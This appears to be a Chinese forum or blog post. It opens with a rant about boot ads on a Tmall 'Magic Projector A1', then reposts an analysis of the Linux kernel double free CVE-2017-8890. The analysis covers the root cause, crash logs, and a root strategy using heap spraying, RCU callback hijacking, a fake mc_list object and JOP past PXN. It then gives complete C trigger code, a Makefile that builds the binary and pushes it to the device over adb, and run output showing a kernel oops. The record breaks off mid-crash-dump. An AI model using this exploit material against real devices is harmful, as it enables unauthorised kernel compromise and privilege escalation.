本来对阿里的东西很有好感,没想到这样的东西就是一个开机广告问题,把我的好感打败了。
开始的时候根本没有开机广告。使用三个月后,系统更新后会出现开机广告。感情升级就是开机广告?果断投诉。
但是呢?最多只是修改了我提到的开机广告音量大,吓死人,音量不可调,开机广告还是存在的。
即使开始四五个月,也是比较新的,直接拆了再扔一边,搬家的时候当垃圾扔。
什么阿里!
突然翻到之前的记录,躺着也躺着,分享一下。
(因为是之前的记录分享,所以在开头的说明文中没有摘录,文中有原文链接。
感谢大神们的分享,感谢大神们PoC EXP代码作者!从开源中分享!
在头部补充之前成功的图片
-------------------------------------------------------------------------------------------------
:CVE-2017-8890
double free
kernel/net/ipv4/inet_connection_sock.c
CVE-2017-8890 补丁如下:
你可以看到这个补丁很简单,只添加了一行代码,作用是 inet_sk(newsk)->mc_list 置为 NULL。结合漏洞类型为 double free,很容易知道它应该在释放过程中处理 mc_list 结构处理不当导致漏洞。
(以下 内容来自)
CVE-分析和利用2017-8890漏洞(Root Android 7.x) - FreeBuf网络安全行业门户 CVE-分析和利用2017-8890漏洞(Root Android 7.x)
通过分析漏洞补丁函数inet_csk_clone_lock,如下图所示:
最终调用源是tcp_v4_rcv,该函数用于处理tcp当三次握手完成真正的连接时,三次握手的数据包将创建新的 socket因此,创造新的问题出现了socket代码如下:
struct sock *inet_csk_clone_lock(const struct sock *sk, const struct request_sock *req,
const gfp_t priority)
{
struct sock *newsk = sk_clone_lock(sk, priority);
if (newsk) {
// ...
// cve-2017-8890 patch
// inet_sk(newsk)->mc_list = NULL;
// ...
}
// ...
}
struct sock *sk_clone_lock(const struct sock *sk, const gfp_t priority)
{
newsk = sk_prot_alloc(sk->sk_prot, priority, sk->sk_family);
if (newsk != NULL) {
sock_copy(newsk, sk);
// newsk init...
}
return newsk;
}
static void sock_copy(struct sock *nsk, const struct sock *osk)
{
#ifdef CONFIG_SECURITY_NETWORK
void *sptr = nsk->sk_security;
#endif
memcpy(nsk, osk, offsetof(struct sock, sk_dontcopy_begin));
memcpy(&nsk->sk_dontcopy_end, &osk->sk_dontcopy_end,
osk->sk_prot->obj_size - offsetof(struct sock, sk_dontcopy_end));
#ifdef CONFIG_SECURITY_NETWORK
nsk->sk_security = sptr;
security_sk_clone(osk, nsk);
#endif
}
最后生成的新socket,在该对象初始化之前,先调用了sock_copy函数将父socket数据拷贝过来,生成一个父sock的副本,并且在后边的初始化过程中,没有将mc_list对象初始化,因此造成了父mc_list对象被新的socket对象引用的结果,如果创建多次,也会被引用多次,最后对mc_list对象也会进行多次释放。
下边问题就是如何创建一个带有mc_list对象的socket。查看源码中所有对mc_list的引用,最后的调用来源如下图所示:
ip_mc_join_group函数用于将socket加入到多播组,该函数的调用接口为ip_setsockopt。
该漏洞类型为double free,必然伴随着可多次释放该对象,创建mc_list对象流程有了,再看下该对象的释放流程,如下图所示:
最终可复现该漏洞,伪代码如下所示:
sockfd = socket(AF_INET, SOCK_STREAM|SOCK_CLOEXEC, IPPROTO_IP);
setsockopt(server_sockfd, SOL_IP, MCAST_JOIN_GROUP, &group, sizeof(group);
accept_sockfd1 = accept(sockfd, (struct sockaddr*)&accept1_si, sizeof(accept1_si));
accept_sockfd2 = accept(sockfd, (struct sockaddr*)&accept2_si, sizeof(accept2_si));
// first free
close(accept_sockfd1);
// second free
close(accept_sockfd2);
崩溃信息如下所示:
[35890.702474] ------------[ cut here ]------------
[35890.702509] kernel BUG at /usr/local/google/buildbot/src/partner-android/n-dev-msm-angler-3.10-nyc-mr2/private/msm-huawei/
mm/slub.c:3364
[35890.702518] Internal error: Oops - BUG: 0 [#1] PREEMPT SMP
[35890.702539] CPU: 0 PID: 8 Comm: rcuc/0 Not tainted 3.10.73-g5b0be8f02fe #1
[35890.702548] task: ffffffc00e9a4b40 ti: ffffffc00e9dc000 task.ti: ffffffc00e9dc000
[35890.702576] PC is at kfree+0xe8/0x1e0
[35890.702594] LR is at rcu_do_batch.isra.35+0x118/0x2b4
[35890.702602] pc : [<ffffffc00030240c>] lr : [<ffffffc000299ab8>] pstate: 40000145
[35890.702608] sp : ffffffc00e9dfc90
[35890.702615] x29: ffffffc00e9dfc90 x28: 00000000000005d7
[35890.702630] x27: ffffffc000ce5000 x26: ffffffc03bffd220
[35890.702641] x25: ffffffc03bffd120 x24: ffffffc00e9dc000
[35890.702653] x23: ffffffc00177f618 x22: ffffffc000299ab8
[35890.702665] x21: ffffffc00160fba8 x20: ffffffc03bffd740
[35890.702677] x19: ffffffbc00efff40 x18: 0000000000000000
[35890.702687] x17: 0000000000000000 x16: 0000000000000001
[35890.702699] x15: 0000000000000000 x14: 0ffffffffffffffe
[35890.702711] x13: 0000000000000030 x12: 0101010101010101
[35890.702722] x11: 7f7f7f7f7f7f7f7f x10: feff676273687672
[35890.702734] x9 : 0000000000000040 x8 : ffffffc0c531be00
[35890.702745] x7 : 00000000000003be x6 : 0000000000000004
[35890.702756] x5 : 0000000000000008 x4 : 0000000000000000
[35890.702767] x3 : ffffffc0c1192450 x2 : 0000000000000000
[35890.702778] x1 : 0000000000efff40 x0 : 0000000000000000
[35890.702792]
[35890.702792] PC: 0xffffffc00030230c:
[35890.702798] 2308 14000002b9805001 aa0103e0b9801801 a8c27bfdf9400bf3 a9bb7bfdd65f03c0 a90153f3910003fd d0004f20aa0003f4 a90363f7a9025bf5 aa1e03f6f9420400
[35890.702835] 2348 b9400801a9046bf9 910003e1340002a1 b94052629272c433 b900526211000442 b4000115f9401015 aa1603e1f94002a3 aa1403e2f94006a0 f8410ea0d63f0060
[35890.702869] 2388 b9405260b5ffff40 b900526051000400 36080040f9400260 f100429f94277066 90004f4054000a29 f9419c00d2c00801 8b010001f9400000 8b140021d2dff780
[35890.702901] 23c8 d34cfc21f2ffffe0 8b000033d37ae421 367800e2f8606822 d50339bff9401a62 d34f3c00f8606820 9a9310536b1f001f 37380180f9400260 f272041ff9400260
[35890.702933] 2408 e7f001f254000041 d34e3821f9400261 b9406a6134000041 97ff36aeaa1303e0 910003e014000031 9272c416f9401a78 97fd434352800020 d538d099f9400317
[35890.702965] 2448 f94007558b17033a 97fd437152800020 36080040f94002c0 f9400b4094277036 54000381eb00027f f8776b21b9802300 d53b4224f8206a81 f9400301d50342df
[35890.702998] 2488 d538d08252800003 f8776b25aa0103e0 eb0500dff8606846 9100202154000181 eb15003ff8616841 f820685454000101 d538d080910022b5 52800023f9400301
[35890.703032] 24c8 f821681591002021 350000c3d51b4224 aa1803e017ffffd8 aa1403e2aa1303e1 a94153f397fffadd a94363f7a9425bf5 a8c57bfda9446bf9 a9bc7bfdd65f03c0
[35890.703065] 2508 a9025bf5910003fd a90153f39000b1b6 b94892d5a90363f7 35000155aa0003f3 d2818000f9400401 ea00003ff2a01520 f9402660540000a1 b9404660b5000060
[35890.703100]
[35890.703100] LR: 0xffffffc0002999b8:
[35890.703106] 99b8 9100a034a90573fb eb02029ff9401822 b400136254001380 aa0003f7aa0103f3 d50342dfd53b4236 900052629406f50e 1ac10c0152800801 937d7c21f945a842
[35890.703139] 99f8 f8616841f9400042 370001609ac02420 913836b5d0009eb5 350000e039401aa0 52810161b0007320 97fe1bc8911ac000 39001aa052800020 f9405a60f9401a61
[35890.703171] 9a38 f9400022f90037a0 f9001662f9401660 91012261f900003f f9400023f9401a79 eb02007ff9401a62 f900003454000041 eb14003fd1002021 d51b423654ffff21
[35890.703203] 9a78 910003e1d2800016 9272c438aa1603fc d0009bb59000527b b40003c0912ea2b5 f9800340f940001a f13ffc5ff9400402 cb020000540000a8 9401a21c910006d6
[35890.703236] 9ab8 d63f004014000002 9100079cf94037a0 5400006aeb00039f 17fffff0aa1a03e0 370801a0f9400300 b9433000f9400b00 9406f4cb34ffff40 f8605840f9450362
[35890.703268] 9af8 f9400b00f8756802 54fffe60eb00005f aa0003fa14000002 d50342dfd53b4238 d5033bbfb500023a f9405a61f9403a60 f9403e60cb160016 cb1c0000f9003a76
[35890.703300] 9b38 f9404660f9003e60 92f000008b1c001c f900467ceb00003f 540002a1f9403e61 f94016601400000d f900032091014261 f900167a9100c260 eb02029ff9400002
[35890.703333] 9b78 f800841954fffd21 54ffff61eb01001f 90009c6017ffffe5 f940080091004002 5400006ceb00003f f9005a60f9400440 b50000c1f9404260 f9004261b40000a0
[35890.703366]
[35890.703366] SP: 0xffffffc00e9dfb90:
[35890.703372] fb90 0000000000000000 0000000000000008 0000000000000004 00000000000003be ffffffc0c531be00 0000000000000040 feff676273687672 7f7f7f7f7f7f7f7f
[35890.703403] fbd0 0101010101010101 0000000000000030 0ffffffffffffffe 0000000000000000 0000000000000001 0000000000000000 0000000000000000 ffffffbc00efff40
[35890.703436] fc10 ffffffc03bffd740 ffffffc00160fba8 ffffffc000299ab8 ffffffc00177f618 ffffffc00e9dc000 ffffffc03bffd120 ffffffc03bffd220 ffffffc000ce5000
[35890.703470] fc50 00000000000005d7 ffffffc00e9dfc90 ffffffc000299ab8 ffffffc00e9dfc90 ffffffc00030240c 0000000040000145 ffffffc00e9dfc90 ffffffc000302458
[35890.703503] fc90 ffffffc00e9dfce0 ffffffc000299ab8 ffffffc0c118cbb0 ffffffc0c118cbd8 ffffffc00160fba8 00000000000005ca ffffffc00177f618 ffffffc00e9dc000
[35890.703535] fcd0 ffffffc03bffd120 ffffffc03bffd220 ffffffc00e9dfd50 ffffffc000299e00 ffffffc00160fda0 ffffffc000ce6000 ffffffc0c118cd98 ffffffc00e9dc000
[35890.703567] fd10 00000000bfb7d000 000000000000000a ffffffc001935438 ffffffc000ce6000 0000000000000001 ffffffc000ce6000 ffffffc0c118cd98 7fffffffffffffff
[35890.703599] fd50 ffffffc00e9dfde0 ffffffc00024baf0 ffffffc00e96d2c0 ffffffc00e9dc000 ffffffc0016efee8 0000000000000001 0000000000000001 0000000000000002
[35890.703632]
[35890.703639] Process rcuc/0 (pid: 8, stack limit = 0xffffffc00e9dc058)
[35890.703647] Call trace:
[35890.703658] [<ffffffc00030240c>] kfree+0xe8/0x1e0
[35890.703667] [<ffffffc000299ab4>] rcu_do_batch.isra.35+0x114/0x2b4
[35890.703674] [<ffffffc000299dfc>] rcu_cpu_kthread+0x1a8/0x308
[35890.703688] [<ffffffc00024baec>] smpboot_thread_fn+0x1dc/0x208
[35890.703703] [<ffffffc000243e7c>] kthread+0xc0/0xcc
[35890.703713] Code: 37380180 f9400260 f272041f 54000041 (e7f001f2)
[35890.703724] ---[ end trace bc62c72cba08ddfd ]---
[35890.723573] Kernel panic - not syncing: Fatal exception in interrupt
[35890.723810] CPU1: stopping
该漏洞的原理比较简单,就是在复制对象的时候将指针也一同复制了一份,造成两个指针指向同一对象。因此,漏洞修复也比较简单,直接在复制对象的时候将mc_list指针置为NULL即可。
该漏洞的利用思路比较简单直接,在第二次释放之前通过堆喷占位即可。
mc_list对象申请通过slab分配器分配,代码如下:
int ip_mc_join_group(struct sock *sk, struct ip_mreqn *imr)
{
// ...
iml = sock_kmalloc(sk, sizeof(*iml), GFP_KERNEL);
// ...
}
对应汇编代码:
ROM:FFFFFFC000BABD6C loc_FFFFFFC000BABD6C ; CODE XREF: ip_mc_join_group+98j
ROM:FFFFFFC000BABD6C MOV X0, X20
ROM:FFFFFFC000BABD70 MOV W1, #0x30
ROM:FFFFFFC000BABD74 MOV W2, #0xD0
ROM:FFFFFFC000BABD78 BL sock_kmalloc
可知,该对象大小为0×30,位于slab-64,所以堆喷64字节数据即可。
堆喷占位后,我们需要劫持eip,因此需要能够占位到对象中的函数指针,mc_list结构体如下所示:
struct callback_head {
struct callback_head *next;
void (*func)(struct callback_head *head);
};
#define rcu_head callback_head
struct ip_mc_socklist {
struct ip_mc_socklist __rcu *next_rcu;
struct ip_mreqn multi;
unsigned int sfmode;
struct ip_sf_socklist __rcu *sflist;
struct rcu_head rcu;
};
该结构体中存在一个回调函数func,因此将该函数指针覆盖即可劫持eip。该回调函数func的处理流程位于对象释放过程:
void ip_mc_drop_socket(struct sock *sk)
{
// ...
if (!inet->mc_list)
return;
rtnl_lock();
while ((iml = rtnl_dereference(inet->mc_list)) != NULL) {
// ...
kfree_rcu(iml, rcu);
}
rtnl_unlock();
}
该函数获取到mc_list对象后,最后调用kfree_rcu,该函数并不是真正的释放该对象,而是调用call_rcu将要删除的对象保存起来,并标记或者开始一个宽限期,等到cpu宽限期结束,会触发一个RCU软中断,再进行释放,如果有回调函数func,则进行回调函数处理流程,整个函数调用逻辑为:
kfree_rcu -> … -> call_rcu -> … -> invoke_rcu_core -> RCU_SOFTIRQ -> rcu_process_callbacks -> … __rcu_reclaim
最后的释放代码如下所示:
#define __is_kfree_rcu_offset(offset) ((offset) < 4096)
static inline bool __rcu_reclaim(const char *rn, struct rcu_head *head)
{
unsigned long offset = (unsigned long)head->func;
rcu_lock_acquire(&rcu_callback_map);
// 是否存在回调函数
if (__is_kfree_rcu_offset(offset)) {
RCU_TRACE(trace_rcu_invoke_kfree_callback(rn, head, offset));
kfree((void *)head - offset);
rcu_lock_release(&rcu_callback_map);
return true;
} else {
RCU_TRACE(trace_rcu_invoke_callback(rn, head));
head->func(head);
rcu_lock_release(&rcu_callback_map);
return false;
}
}
对应的汇编代码:
如果不存在回调函数,func会被设置成该成员在对象中的偏移,也就是0×20,当func值大于4096即可触发到回调函数流程,即劫持eip。
最终漏洞利用示意图如下所示:
劫持eip的崩溃信息如图所示:
虽然劫持了eip,按照早期的安卓提权思路,直接ret2user即可完成提权操作,然而早已经加入了PXN保护,需要构造JOP来绕过,但是构造JOP需要至少控制一个寄存器,而回调函数执行后的参数为head,即为ip_mc_socklist.rcu地址,该地址为一个内核地址,数据并不可控,从崩溃信息x0寄存器的值也证实了这一点,置此,该漏洞还无法有效利用。
通过对mc_list释放流程的深入研究,最终发现在ip_mc_socklist结构体中,有另外一个很重要的指针变量next_rcu,在内核中,该指针指向下一个ip_mc_socklist对象,并且在ip_mc_drop_socket函数释放流程,会循环遍历该链表,直到next_rcu == NULL,部分代码如下所示:
void ip_mc_drop_socket(struct sock *sk)
{
rtnl_lock();
while ((iml = rtnl_dereference(inet->mc_list)) != NULL) {
inet->mc_list = iml->next_rcu;
kfree_rcu(iml, rcu);
}
rtnl_unlock();
}
因此,我们可以在用户态伪造一个ip_mc_socklist对象fake_iml,然后通过堆喷占位,使第一次被释放的ip_mc_socklist.next_rcu = fake_iml,当内核在处理我们的fake_iml时,最后调用的fun(head)都是我们可控的,且head指向的是用户空间,因此可以达到控制x0寄存器的目的,最终利用示意图如下所示:
控制了eip和x0寄存器,就可以构造JOP进行后续的提权操作,流程比较固定,暂不细讲,最终漏洞利用如下图,测试手机为 Nexus6P 7.12
Multicast technologies on TCP/IP networks
What is RCU, Fundamentally?
Linux 2.6内核中新的锁机制–RCU
+ 设备: 天猫魔屏A1, Android 5.1.1,Linux localhost 3.14.29 #1 SMP PREEMPT armv7l GNU/Linux
+ 信息确认: linux-3.14中存在此漏洞(涉及4.10以下版本),但尚不明确 魔屏A1 上是否已修复。
+ 参考1:[原创]CVE-2017-8890 深度分析-二进制漏洞-看雪论坛-安全社区|安全招聘|bbs.pediy.com [原创] CVE-2017-8890 深度分析
+ 参考2:[原创] CVE-2017-8890 漏洞利用(root nexus6p@kernel 3.10)-Android安全-看雪论坛-安全社区|安全招聘|bbs.pediy.com [原创] CVE-2017-8890 漏洞利用(root nexus6p@kernel 3.10)
/*
* CVE-2017-8890
* This is a dobule free vulnerability found by Pray3r using syzkaller from TYA.
*
* -> entry_SYSCALL_64_fastpath() -> SyS_setsockopt() -> SYSC_setsockopt()
* -> sock_common_setsockopt() -> tcp_setsockopt()
* -> ip_setsockopt() -> do_ip_setsockopt() -> do_ip_setsockopt()
* -> ip_mc_join_group() -> sock_kmalloc() -> [...]
*/
/* to use accept4 */
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <pthread.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define TEST_PORT 45555
static int cpu_num;
//static int cpu_id;
static int svr_sockfd;
static struct sockaddr_in svr_addr;
static int svr_ready;
static int cli_sockfd[2];
static int cli_finish;
static void* cli_thread(void *arg)
{
int i = 0, sockfd = -1;
struct sockaddr_in svraddr;
printf("%s: UID=%u, EUID=%u, GID=%u\n", __func__,
getuid(), geteuid(), getgid());
while(!svr_ready)
usleep(1);
memset(&svraddr, 0, sizeof(svraddr));
svraddr.sin_family = AF_INET;
svraddr.sin_port = htons(TEST_PORT);
svraddr.sin_addr.s_addr = inet_addr("127.0.0.1");
for(i=0; i<2; i++) {
sockfd = socket(AF_INET, SOCK_STREAM|SOCK_CLOEXEC, IPPROTO_IP);
if(sockfd < 0) {
printf("create client[%d] socket err: %s\n", i, strerror(errno));
continue;
}
printf("create client[%d] socket ok: fd %d\n", i, sockfd);
if(connect(sockfd, (struct sockaddr*)&svraddr, sizeof(svraddr)) < 0) {
printf("client[%d] connect server err: %s\n", i, strerror(errno));
continue;
}
printf("client[%d] connect server ok\n", i);
close(sockfd);
}
printf("client thread exit\n");
cli_finish = 1;
pthread_exit(0);
}
int main(int argc, char *argv[])
{
struct sockaddr_in addr;
struct group_req req;
pthread_t tid;
int i = 0;
/* print info */
cpu_num = sysconf(_SC_NPROCESSORS_CONF);
setbuf(stdout, NULL);
printf("CVE-2017-8890 exploit. cpu_num : %d\n", cpu_num);
printf("Program %s: UID=%u, EUID=%u, GID=%u\n", argv[0],
getuid(), geteuid(), getgid());
/* ------------------------------------------------------- */
svr_sockfd = socket(AF_INET, SOCK_STREAM | SOCK_CLOEXEC , IPPROTO_IP);
if(svr_sockfd < 0) {
printf("create server socket err: %s\n", strerror(errno));
return 0;
}
printf("create server socket %d ok\n", svr_sockfd);
memset(&addr, 0, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_port = htons(TEST_PORT);
addr.sin_addr.s_addr = inet_addr("224.0.0.0"); // multicast address
req.gr_interface = 1;
memcpy(&req.gr_group, &addr, sizeof(addr));
if(setsockopt(svr_sockfd, SOL_IP, MCAST_JOIN_GROUP, &req, sizeof(req)) < 0) {
printf("set server socket join group err: %s\n", strerror(errno));
goto end;
}
printf("server socket join group ok\n");
memset(&svr_addr, 0, sizeof(svr_addr));
svr_addr.sin_family = AF_INET;
svr_addr.sin_port = htons(TEST_PORT);
svr_addr.sin_addr.s_addr = inet_addr("127.0.0.1");
if(bind(svr_sockfd, (struct sockaddr*)&svr_addr, sizeof(svr_addr)) < 0) {
printf("server socket bind port %u err: %s\n", TEST_PORT, strerror(errno));
goto end;
}
printf("server socket bind port %u ok\n", TEST_PORT);
if(listen(svr_sockfd, 2) < 0) {
printf("server socket listen on port %u err: %s\n", TEST_PORT, strerror(errno));
goto end;
}
printf("server socket listening on port %u\n", TEST_PORT);
if(pthread_create(&tid, NULL, cli_thread, NULL) < 0) {
printf("create client thread err: %s\n", strerror(errno));
goto end;
}
printf("create client thread ok\n");
svr_ready = 1;
for(i=0; i<2; i++) {
cli_sockfd[i] = accept4(svr_sockfd, NULL, NULL, 0);
if(cli_sockfd[i] < 0) {
printf("create client thread err: %s\n", strerror(errno));
goto end;
}
printf("accept client[%d] ok: fd %d\n", i, cli_sockfd[i]);
}
printf("wait client thread finish\n");
while(!cli_finish);
printf("client thread finished\n");
printf("[*] now close client[0] fd %d\n", cli_sockfd[0]);
close(cli_sockfd[0]);
printf("[*] prepare close client[1] fd %d\n", cli_sockfd[1]);
close(cli_sockfd[1]);
printf("something ???\n");
sleep(3);
printf("nothing, to exit\n");
end:
close(svr_sockfd);
return 0;
}
CROSS = $(shell pwd)/../toolchain_arch64
CROSS_COMPILE = $(CROSS)/bin/aarch64-linux-gnu-
CC = $(CROSS_COMPILE)gcc
STRIP = $(CROSS_COMPILE)strip
TARG = exp
OBJS = main.o
CFLAGS = -Wall
LDFLAGS = -static -pthread
all: $(TARG)
$(TARG): $(OBJS)
$(CC) $^ $(LDFLAGS) -o $@
$(STRIP) $@
%.o: %.c
$(CC) -c $^ $(CFLAGS) -o $@
run: $(TARG)
@adb connect 192.168.100.2
@adb push $(TARG) /data/local/tmp/$(TARG) > /dev/null
@adb shell 'chmod 777 /data/local/tmp/$(TARG)' > /dev/null
@echo "----- run $(TARG) -----"
@adb shell /data/local/tmp/$(TARG)
@echo "----- run end -----"
clean:
rm -rf *.o $(TARG)
already connected to 192.168.100.2:5555
----- run exp -----
CVE-2017-8890 exploit. cpu_num : 4
Program /data/local/tmp/exp: UID=2000, EUID=2000, GID=2000
create server socket 3 ok
server socket join group ok
server socket bind port 45555 ok
server socket listening on port 45555
create client thread ok
cli_thread: UID=2000, EUID=2000, GID=2000
create client[0] socket ok: fd 5
accept client[0] ok: fd 4
client[0] connect server ok
create client[1] socket ok: fd 5
accept client[1] ok: fd 6
wait client thread finish
client[1] connect server ok
client thread exit
client thread finished
[*] now close client[0] fd 4
[*] prepare close client[1] fd 6
something ???
nothing, to exit
----- run end -----
shell@MagicProjector_A1:/ $ [ 76.575284] c0 1 (init) init: process 'dhcpcd_eth0', pid 3977 exited
[ 78.577487] c0 5629 (exp) Unable to handle kernel paging request at virtual address deeba000
[ 78.580489] c0 5629 (exp) pgd = ffffffc01815a000
[ 78.587658] [deeba000] *pgd=0000000000000000
[ 78.589677] c0 5629 (exp) Internal error: Oops: 96000005 [#1] PREEMPT SMP
[ 78.595796] Modules linked in: wlan(O) wlan_prealloc(O) mac80211 cfg80211(O) compat(O) dwc3 mali(O)
[ 78.604767] c0 5629 (exp) CPU: 0 PID: 5629 Comm: exp Tainted: G W O 3.14.29-00002-g9d3299d #1
[ 78.613907] c0 5629 (exp) task: ffffffc0225e1000 ti: ffffffc00c9ec000 task.ti: ffffffc00c9ec000
[ 78.622537] c0 5629 (exp) PC is at ip_mc_drop_socket+0x40/0xb4
[ 78.628310] c0 5629 (exp) LR is at ip_mc_drop_socket+0x94/0xb4
[ 78.634088] c0 5629 (exp) pc : [<ffffffc0017f8da4>] lr : [<ffffffc0017f8df8>] pstate: 80000145
[ 78.642626] c0 5629 (exp) sp : ffffffc00c9efd70
[ 78.647110] x29: ffffffc00c9efd70 x28: ffffffc00c9ec000
[ 78.652371] x27: ffffffc001d37000 x26: 0000000000000039
[ 78.657633] x25: 0000000000000116 x24: ffffffc012a90910
[ 78.662894] x23: ffffffc001dee540 x22: ffffffc023f68700
[ 78.668155] x21: 0000000000000000 x20: ffffffc023f68810
[ 78.673416] x19: 00000000deeba000 x18: 000000000049a000
[ 78.678677] x17: 00000000004a2000 x16: ffffffc0011bb9a0
[ 78.683939] x15: 0000000000001000 x14: 0000000000000001
[ 78.689200] x13: 0000000000000000 x12: 0000000000000000
[ 78.694461] x11: 0101010101010101 x10: 7f7f7f7f7f7f7f7f
[ 78.699722] x9 : fefefefefefefeff x8 : 0000000000000039
[ 78.704984] x7 : 0000000000000000 x6 : 0000000000000000
[ 78.710245] x5 : 0000000000000000 x4 : ffffffc023f68810
[ 78.715506] x3 : 0000000000000001 x2 : 0000000000000000
[ 78.720767] x1 : 0000000000000009 x0 : 0000000000002710
[ 78.726031] c0 5629 (exp)
[ 78.726031] PC: 0xffffffc0017f8d24:
[ 78.732152] 8d24 b9404fa0 a94153f3 a9425bf5 f9401bf7 a8c57bfd d65f03c0 52800004 710004bf
[ 78.740260] 8d44 54fffde1 6b02009f 1a9f27e0 17fffff3 52800000 17fffff1 52800004 17ffffe6
[ 78.748367] 8d64 a9bc7bfd 910003fd a90153f3 a9025bf5 f9001bf7 aa0003f6 aa1e03e0 d503201f
[ 78.756475] 8d84 f9416ec0 b40003e0 97fda50c f9416ed3 d0002fb7 910442d4 911502f7 b4000313
[ 78.764582] 8da4 f9400261 aa1703e0 f9016ec1 b9401261 97ffd8bd aa0003f5 aa0003e2 aa1303e1
[ 78.772690] 8dc4 aa1603e0 97fff9d5 aa1503e0 b4000075 b9400a61 97fff97f 885f7e80 5100c000
[ 78.780797] 8de4 88017e80 35ffffa1 d2800401 8b010260 97e43526 f9416ed3 b5fffd53 97fda4f8
[ 78.788904] 8e04 a94153f3 a9425bf5 f9401bf7 a8c47bfd d65f03c0 a9bd7bfd 910003fd a90153f3
[ 78.797014] c0 5629 (exp)
[ 78.797014] LR: 0xffffffc0017f8d78:
[ 78.803136] 8d78 aa0003f6 aa1e03e0 d503201f f9416ec0 b40003e0 97fda50c f9416ed3 d0002fb7
[ 78.811243] 8d98 910442d4 911502f7 b4000313 f9400261 aa1703e0 f9016ec1 b9401261 97ffd8bd
[ 78.819351] 8db8 aa0003f5 aa0003e2 aa1303e1 aa1603e0 97fff9d5 aa1503e0 b4000075 b9400a61
[ 78.827458] 8dd8 97fff97f 885f7e80 5100c000 88017e80 35ffffa1 d2800401 8b010260 97e43526
[ 78.835566] 8df8 f9416ed3 b5fffd53 97fda4f8 a94153f3 a9425bf5 f9401bf7 a8c47bfd d65f03c0
[ 78.843673] 8e18 a9bd7bfd 910003fd a90153f3 aa0003f4 aa1e03e0 b9002ba1 53003c73 b9002fa2
[ 78.851781] 8e38 d503201f f9401284 b9402fa2 b9402ba1 b4000664 52800020 72b3c6e0 1b007c20
[ 78.859888] 8e58 53177c00 f8605884 b5000084 1400001e f9401c84 b4000384 b9400880 6b01001f
[ 78.867997] c0 5629 (exp)
[ 78.867997] SP: 0xffffffc00c9efcf0:
[ 78.874120] fcf0 23f68810 ffffffc0 00000000 00000000 23f68700 ffffffc0 01dee540 ffffffc0
[ 78.882227] fd10 12a90910 ffffffc0 00000116 00000000 00000039 00000000 01d37000 ffffffc0
[ 78.890334] fd30 0c9ec000 ffffffc0 0c9efd70 ffffffc0 017f8df8 ffffffc0 0c9efd70 ffffffc0
[ 78.898442] fd50 017f8da4 ffffffc0 80000145 00000000 00000000 00000000 00000020 00000000
[ 78.906550] fd70 0c9efdb0 ffffffc0 017f2c64 ffffffc0 23f68700 ffffffc0 247a6780 ffffffc0
[ 78.914657] fd90 00000000 00000000 20f59300 ffffffc0 0014a660 ffffffc0 017f2c30 ffffffc0
[ 78.922764] fdb0 0c9efde0 ffffffc0 01738bb8 ffffffc0 247a6780 ffffffc0 00000000 00000000
[ 78.930872] fdd0 247a67b0 ffffffc0 00000039 00000000 0c9efe00 ffffffc0 01738c50 ffffffc0
[ 78.938983] c0 5629 (exp)
[ 78.938983] X4: 0xffffffc023f68790:
[ 78